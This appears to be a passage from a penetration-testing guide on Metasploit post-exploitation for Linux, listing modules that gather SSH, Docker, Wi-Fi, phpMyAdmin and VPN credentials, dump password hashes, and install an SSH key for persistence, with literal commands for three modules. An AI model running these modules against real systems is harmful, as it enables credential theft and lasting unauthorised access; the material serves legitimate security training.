Credential Gathering
Once a system is compromised, gathering credentials is crucial for lateral movement and further exploitation.
Extracting SSH Credentials
use post/multi/gather/ssh_creds
set SESSION 1
run
This module extracts stored SSH credentials, which can be used to access other machines in the network.
Extracting Docker Credentials
use post/multi/gather/docker_creds
set SESSION 1
run
This command retrieves Docker authentication credentials, which may provide access to containerized applications and services.
Dumping Linux Password Hashes
use post/linux/gather/hashdump
set SESSION 1
set VERBOSE true
run
Hash dumping allows attackers to obtain user password hashes, which can be cracked offline using tools like Hashcat or John the Ripper.
Retrieving EcryptFS Credentials
If the target system uses EcryptFS for encrypted directories, this module extracts the necessary keys.
Enumerating Wireless Pre-Shared Keys
This module lists stored Wi-Fi passwords, which can be useful for network pivoting.
Extracting XChat Credentials
Attackers can use this module to extract credentials and chat logs from XChat, an IRC client.
Stealing phpMyAdmin Credentials
Many administrators use phpMyAdmin to manage databases. This module extracts stored credentials, allowing access to sensitive data.
Retrieving PPTP VPN Secrets
This module collects credentials stored in the chap-secrets file, potentially giving an attacker access to VPN connections.
Maintaining access to a compromised system ensures an attacker can return even after a reboot or security patch.
SSH Key Persistence
This module installs an SSH key for persistent access, ensuring the attacker can log in even if passwords are changed.
Last updated